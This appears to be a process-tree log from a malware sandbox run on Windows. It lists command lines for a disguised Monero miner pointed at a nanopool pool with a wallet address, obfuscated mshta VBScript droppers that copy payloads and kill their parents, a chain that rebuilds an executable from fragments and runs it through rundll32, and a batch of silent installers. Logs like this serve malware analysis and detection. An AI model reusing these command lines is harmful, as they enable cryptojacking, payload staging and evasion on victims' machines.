C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
12⤵
PID:4648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu1845e47d7bd.exe
4⤵
PID:3552

C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu1845e47d7bd.exe
Thu1845e47d7bd.exe
5⤵
PID:3300

C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu1845e47d7bd.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu1845e47d7bd.exe
6⤵
- Executes dropped EXE
PID:5224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu182fbc50b73fe9.exe
4⤵
PID:1624

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu18a3a314f20e06.exe /mixone
4⤵
PID:2028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu18f6e6cc3c274.exe
4⤵
PID:3420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu1877bc7d13.exe
4⤵
PID:1208

C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu18f6e6cc3c274.exe
Thu18f6e6cc3c274.exe
1⤵
- Executes dropped EXE
PID:888

C:\Users\Admin\AppData\Local\Temp\is-DCNCH.tmp\Thu18f6e6cc3c274.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DCNCH.tmp\Thu18f6e6cc3c274.tmp" /SL5="$4009A,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu18f6e6cc3c274.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2232

C:\Users\Admin\AppData\Local\Temp\is-RFAGB.tmp\DYbALA.exe
"C:\Users\Admin\AppData\Local\Temp\is-RFAGB.tmp\DYbALA.exe" /S /UID=2720
3⤵
- Executes dropped EXE
PID:5192

C:\Users\Admin\AppData\Local\Temp\53-89ad6-03a-4fe88-c4a97b143e7d9\Laetewaepaka.exe
"C:\Users\Admin\AppData\Local\Temp\53-89ad6-03a-4fe88-c4a97b143e7d9\Laetewaepaka.exe"
4⤵
PID:3872

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2geifcpy.xeg\ww15_testLL_0310_single.exe & exit
5⤵
PID:1916

C:\Users\Admin\AppData\Local\Temp\2geifcpy.xeg\ww15_testLL_0310_single.exe
C:\Users\Admin\AppData\Local\Temp\2geifcpy.xeg\ww15_testLL_0310_single.exe
6⤵
PID:1168

C:\Users\Admin\Pictures\Adobe Films\4ldYMRuqpyLUm4VQnUNyACc4.exe
"C:\Users\Admin\Pictures\Adobe Films\4ldYMRuqpyLUm4VQnUNyACc4.exe"
7⤵
PID:3916

C:\Users\Admin\Pictures\Adobe Films\5WJOFpRDTYzsQcWlKCpYugsZ.exe
"C:\Users\Admin\Pictures\Adobe Films\5WJOFpRDTYzsQcWlKCpYugsZ.exe"
7⤵
PID:5144

C:\Users\Admin\Pictures\Adobe Films\sBkGYyZpzw7_14ifZx9eXFdL.exe
"C:\Users\Admin\Pictures\Adobe Films\sBkGYyZpzw7_14ifZx9eXFdL.exe"
7⤵
PID:5956

C:\Users\Admin\Pictures\Adobe Films\CL8JwjH6dnXwYCn411ZXXcfS.exe
"C:\Users\Admin\Pictures\Adobe Films\CL8JwjH6dnXwYCn411ZXXcfS.exe"
7⤵
PID:5328

C:\Users\Admin\Pictures\Adobe Films\BHN_hoY5TwmP4vi38Sk9LCv7.exe
"C:\Users\Admin\Pictures\Adobe Films\BHN_hoY5TwmP4vi38Sk9LCv7.exe"
7⤵
PID:5720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 296
8⤵
- Program crash
PID:3796

C:\Users\Admin\Pictures\Adobe Films\prmL7tKifu8sFpZ7alpe0Jn_.exe
"C:\Users\Admin\Pictures\Adobe Films\prmL7tKifu8sFpZ7alpe0Jn_.exe"
7⤵
PID:5560

C:\Users\Admin\Pictures\Adobe Films\26tche50TGio4z0SyV0_Qa9P.exe
"C:\Users\Admin\Pictures\Adobe Films\26tche50TGio4z0SyV0_Qa9P.exe"
7⤵
PID:4332

C:\Users\Admin\Pictures\Adobe Films\26tche50TGio4z0SyV0_Qa9P.exe
"C:\Users\Admin\Pictures\Adobe Films\26tche50TGio4z0SyV0_Qa9P.exe"
8⤵
PID:1120

C:\Users\Admin\Pictures\Adobe Films\EFn_KFhIOd7BiflBgnYUTCJb.exe
"C:\Users\Admin\Pictures\Adobe Films\EFn_KFhIOd7BiflBgnYUTCJb.exe"
7⤵
PID:3020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 300
8⤵
- Program crash
PID:6484

C:\Users\Admin\Pictures\Adobe Films\SSobl_4bmXcX8SW4e6BkOr0U.exe
"C:\Users\Admin\Pictures\Adobe Films\SSobl_4bmXcX8SW4e6BkOr0U.exe"
7⤵
PID:3408

C:\Users\Admin\Pictures\Adobe Films\DjTEdhiEYopgj_Vf3OlooLgK.exe
"C:\Users\Admin\Pictures\Adobe Films\DjTEdhiEYopgj_Vf3OlooLgK.exe"
7⤵
PID:4520

C:\Users\Admin\Pictures\Adobe Films\P753CKXRGySV4_2tiRTkfWLA.exe
"C:\Users\Admin\Pictures\Adobe Films\P753CKXRGySV4_2tiRTkfWLA.exe"
7⤵
PID:1276

C:\Users\Admin\AppData\Roaming\proliv041.exe
C:\Users\Admin\AppData\Roaming\proliv041.exe
8⤵
PID:3456

C:\Users\Admin\AppData\Roaming\Underdress.exe
C:\Users\Admin\AppData\Roaming\Underdress.exe
8⤵
PID:4196

C:\Users\Admin\Pictures\Adobe Films\uZGYUfrxKRMy8hpPx8YaD_38.exe
"C:\Users\Admin\Pictures\Adobe Films\uZGYUfrxKRMy8hpPx8YaD_38.exe"
7⤵
PID:968

C:\Users\Admin\Pictures\Adobe Films\SPDXAGIGSDCYt9CLQQyhy806.exe
"C:\Users\Admin\Pictures\Adobe Films\SPDXAGIGSDCYt9CLQQyhy806.exe"
7⤵
PID:1324

C:\Users\Admin\Pictures\Adobe Films\9sDVu3hssOIagjOQT5muP2sg.exe
"C:\Users\Admin\Pictures\Adobe Films\9sDVu3hssOIagjOQT5muP2sg.exe"
7⤵
PID:5124

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
8⤵
PID:5944

C:\Users\Admin\Pictures\Adobe Films\rXFzSeA3qRqozznEGmaDjZSu.exe
"C:\Users\Admin\Pictures\Adobe Films\rXFzSeA3qRqozznEGmaDjZSu.exe"
7⤵
PID:1420

C:\Users\Admin\Pictures\Adobe Films\2UDbBffwZUpZPJjcOZW8MWy9.exe
"C:\Users\Admin\Pictures\Adobe Films\2UDbBffwZUpZPJjcOZW8MWy9.exe"
7⤵
PID:1340

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
8⤵
PID:7508

C:\Users\Admin\Pictures\Adobe Films\ZGzMG2aBCaNBqGPzH0kHnNc5.exe
"C:\Users\Admin\Pictures\Adobe Films\ZGzMG2aBCaNBqGPzH0kHnNc5.exe"
7⤵
PID:4668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 300
8⤵
- Program crash
PID:7200

C:\Users\Admin\Pictures\Adobe Films\ArPJT9jo4BCWZXdUm7qmED1J.exe
"C:\Users\Admin\Pictures\Adobe Films\ArPJT9jo4BCWZXdUm7qmED1J.exe"
7⤵
PID:5540

C:\Users\Admin\Pictures\Adobe Films\WECuhS1FiJkIhivw2zgKcSK7.exe
"C:\Users\Admin\Pictures\Adobe Films\WECuhS1FiJkIhivw2zgKcSK7.exe"
7⤵
PID:6892

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\WECuhS1FiJkIhivw2zgKcSK7.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\WECuhS1FiJkIhivw2zgKcSK7.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
8⤵
PID:6076

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\WECuhS1FiJkIhivw2zgKcSK7.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\WECuhS1FiJkIhivw2zgKcSK7.exe" ) do taskkill -im "%~NxK" -F
9⤵
PID:7716

C:\Users\Admin\Pictures\Adobe Films\g0EL0jqVhBusA0Aqgb7F9kj8.exe
"C:\Users\Admin\Pictures\Adobe Films\g0EL0jqVhBusA0Aqgb7F9kj8.exe"
7⤵
PID:2616

C:\Users\Admin\Pictures\Adobe Films\Ti8zH73Vdy9GStQX1bCDik1q.exe
"C:\Users\Admin\Pictures\Adobe Films\Ti8zH73Vdy9GStQX1bCDik1q.exe"
7⤵
PID:6664

C:\Users\Admin\Pictures\Adobe Films\_JgbqpoNhKCEcfX7XPhsw7zD.exe
"C:\Users\Admin\Pictures\Adobe Films\_JgbqpoNhKCEcfX7XPhsw7zD.exe"
7⤵
PID:4064

C:\Users\Admin\Pictures\Adobe Films\dIKjs4Y7qzrmvL8Pb5XnLtZh.exe
"C:\Users\Admin\Pictures\Adobe Films\dIKjs4Y7qzrmvL8Pb5XnLtZh.exe"
7⤵
PID:5172

C:\Users\Admin\Pictures\Adobe Films\EEt0w8lbzyyrUZ3xNCLoyfJh.exe
"C:\Users\Admin\Pictures\Adobe Films\EEt0w8lbzyyrUZ3xNCLoyfJh.exe"
7⤵
PID:1568

C:\Users\Admin\AppData\Local\Temp\is-N9DJP.tmp\EEt0w8lbzyyrUZ3xNCLoyfJh.tmp
"C:\Users\Admin\AppData\Local\Temp\is-N9DJP.tmp\EEt0w8lbzyyrUZ3xNCLoyfJh.tmp" /SL5="$90360,506127,422400,C:\Users\Admin\Pictures\Adobe Films\EEt0w8lbzyyrUZ3xNCLoyfJh.exe"
8⤵
PID:6696

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vghd32fr.nkt\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit
5⤵
PID:5500

C:\Users\Admin\AppData\Local\Temp\vghd32fr.nkt\setting.exe
C:\Users\Admin\AppData\Local\Temp\vghd32fr.nkt\setting.exe SID=778 CID=778 SILENT=1 /quiet
6⤵
PID:3992

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ibdqydam.hwj\GcleanerEU.exe /eufive & exit
5⤵
PID:1912

C:\Users\Admin\AppData\Local\Temp\ibdqydam.hwj\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\ibdqydam.hwj\GcleanerEU.exe /eufive
6⤵
PID:6884

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uolusn1g.2kk\vpn.exe /silent /subid=798 & exit
5⤵
PID:6088

C:\Users\Admin\AppData\Local\Temp\uolusn1g.2kk\vpn.exe
C:\Users\Admin\AppData\Local\Temp\uolusn1g.2kk\vpn.exe /silent /subid=798
6⤵
PID:1248

C:\Users\Admin\AppData\Local\Temp\is-8DO1U.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8DO1U.tmp\vpn.tmp" /SL5="$703E8,15170975,270336,C:\Users\Admin\AppData\Local\Temp\uolusn1g.2kk\vpn.exe" /silent /subid=798
7⤵
PID:7232

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bu21ikod.ycv\installer.exe /qn CAMPAIGN="654" & exit
5⤵
PID:6452

C:\Users\Admin\AppData\Local\Temp\bu21ikod.ycv\installer.exe
C:\Users\Admin\AppData\Local\Temp\bu21ikod.ycv\installer.exe /qn CAMPAIGN="654"
6⤵
PID:7912

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h0pywrpz.xvw\any.exe & exit
5⤵
PID:7468

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ciions4y.t3h\customer51.exe & exit
5⤵
PID:8008

C:\Users\Admin\AppData\Local\Temp\eb-4bc18-dd6-651a3-871ed71f1176a\SHecokahamae.exe
"C:\Users\Admin\AppData\Local\Temp\eb-4bc18-dd6-651a3-871ed71f1176a\SHecokahamae.exe"
4⤵
PID:5040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
5⤵
PID:6820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc969246f8,0x7ffc96924708,0x7ffc96924718
6⤵
PID:5056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,5011547147101211493,11536946929312499972,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,5011547147101211493,11536946929312499972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
6⤵
PID:1932

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,5011547147101211493,11536946929312499972,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2580 /prefetch:8
6⤵
PID:2228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5011547147101211493,11536946929312499972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1
6⤵
PID:2232

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5011547147101211493,11536946929312499972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
6⤵
PID:2912

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5011547147101211493,11536946929312499972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2028 /prefetch:1
6⤵
PID:5344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5011547147101211493,11536946929312499972,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:1
6⤵
PID:5568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5011547147101211493,11536946929312499972,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
6⤵
PID:3420

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5011547147101211493,11536946929312499972,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:1
6⤵
PID:6624

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,5011547147101211493,11536946929312499972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4016 /prefetch:8
6⤵
PID:3332

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,5011547147101211493,11536946929312499972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4016 /prefetch:8
6⤵
PID:4900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5011547147101211493,11536946929312499972,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
6⤵
PID:5692

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5011547147101211493,11536946929312499972,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
6⤵
PID:4028

C:\Program Files\Windows Sidebar\XSMIXNUOTR\foldershare.exe
"C:\Program Files\Windows Sidebar\XSMIXNUOTR\foldershare.exe" /VERYSILENT
4⤵
PID:5232

C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu182fbc50b73fe9.exe
Thu182fbc50b73fe9.exe
1⤵
- Executes dropped EXE
PID:4984

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCRIPt: CLoSE ( CReatEObjecT ( "WscrIpT.shell").rUn ( "cMD.EXE /q /c TYpe ""C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu182fbc50b73fe9.exe"" > TteQK.EXE&& sTart TTEQK.EXe /Pvuh1jGULtjaO72XEqw~xfB1p3w2ls &iF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu182fbc50b73fe9.exe"" ) do taskkill /F /IM ""%~nXZ"" " , 0 ,tRUe))
2⤵
PID:3176

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu182fbc50b73fe9.exe" > TteQK.EXE&& sTart TTEQK.EXe /Pvuh1jGULtjaO72XEqw~xfB1p3w2ls &iF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu182fbc50b73fe9.exe") do taskkill /F /IM "%~nXZ"
3⤵
PID:4788

C:\Users\Admin\AppData\Local\Temp\TteQK.EXE
TTEQK.EXe /Pvuh1jGULtjaO72XEqw~xfB1p3w2ls
4⤵
- Executes dropped EXE
PID:5236

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCRIPt: CLoSE ( CReatEObjecT ( "WscrIpT.shell").rUn ( "cMD.EXE /q /c TYpe ""C:\Users\Admin\AppData\Local\Temp\TteQK.EXE"" > TteQK.EXE&& sTart TTEQK.EXe /Pvuh1jGULtjaO72XEqw~xfB1p3w2ls &iF ""/Pvuh1jGULtjaO72XEqw~xfB1p3w2ls "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\TteQK.EXE"" ) do taskkill /F /IM ""%~nXZ"" " , 0 ,tRUe))
5⤵
PID:5408

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\Admin\AppData\Local\Temp\TteQK.EXE" > TteQK.EXE&& sTart TTEQK.EXe /Pvuh1jGULtjaO72XEqw~xfB1p3w2ls &iF "/Pvuh1jGULtjaO72XEqw~xfB1p3w2ls " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\TteQK.EXE") do taskkill /F /IM "%~nXZ"
6⤵
PID:5624

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRIPT:cLOse (CrEATEoBJEcT ("WScripT.sHELl" ). ruN ("CmD /c ECHo | SET /p = ""MZ"" > N01_VxB.6& CopY /y /b N01_VXB.6+ 8_2A.ZqT+ L8GbQY.L + PGLMIMf.K Y97fZer.RCF & start control.exe .\y97FZeR.rCf & deL 8_2A.ZQt L8GbQy.L PGLMImF.K N01_VXB.6 " ,0 , tRUe ) )
5⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3956

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ECHo | SET /p = "MZ" >N01_VxB.6&CopY /y /b N01_VXB.6+ 8_2A.ZqT+ L8GbQY.L+ PGLMIMf.K Y97fZer.RCF & start control.exe .\y97FZeR.rCf & deL 8_2A.ZQt L8GbQy.L PGLMImF.K N01_VXB.6
6⤵
PID:1616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>N01_VxB.6"
7⤵
PID:6836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHo "
7⤵
PID:6828

C:\Windows\SysWOW64\control.exe
control.exe .\y97FZeR.rCf
7⤵
PID:4612

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\y97FZeR.rCf
8⤵
PID:6464

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\y97FZeR.rCf
9⤵
PID:5944

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\y97FZeR.rCf
10⤵
PID:6668

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM "Thu182fbc50b73fe9.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5452

C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu1877bc7d13.exe
Thu1877bc7d13.exe
1⤵
- Executes dropped EXE
PID:4000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4000 -s 300
2⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4408

C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu18a3a314f20e06.exe
Thu18a3a314f20e06.exe /mixone
1⤵
- Executes dropped EXE
PID:3360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4512 -ip 4512
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4000 -ip 4000
1⤵
PID:3956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1408 -ip 1408
1⤵
PID:2616

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4416

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
- Loads dropped DLL
PID:5220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5724 -ip 5724
1⤵
PID:6012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4092 -ip 4092
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5220 -ip 5220
1⤵
PID:4556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 412 -ip 412
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6060 -ip 6060
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:3048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 3124 -ip 3124
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 408 -ip 408
1⤵
PID:6012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 5288 -ip 5288
1⤵
PID:6244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 3256 -ip 3256
1⤵
PID:6908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 3360 -ip 3360
1⤵
PID:6576

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 412 -p 2072 -ip 2072
1⤵
PID:6596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 6040 -ip 6040
1⤵
PID:1572

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 756 -p 5728 -ip 5728
1⤵
PID:6988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 4000 -ip 4000
1⤵
PID:7156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5748 -ip 5748
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of SetThreadContext
PID:3124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 2716 -ip 2716
1⤵
PID:5136

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 628 -p 5636 -ip 5636
